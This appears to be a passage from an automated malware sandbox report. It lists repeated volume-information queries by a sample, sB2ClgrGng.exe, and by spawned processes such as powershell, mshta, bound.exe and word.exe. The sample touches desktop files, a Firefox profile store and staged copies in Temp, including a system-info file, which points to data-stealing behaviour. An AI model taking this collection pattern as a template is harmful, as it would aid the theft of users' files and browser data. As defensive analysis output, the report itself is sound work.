                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\BPMLNOBVSB.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\BPMLNOBVSB.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\CURQNKVOIX.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\CURQNKVOIX.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ \System\System Info.txt VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bound.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\word.exeQueries volume information: C:\Users\user\AppData\Roaming\word.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
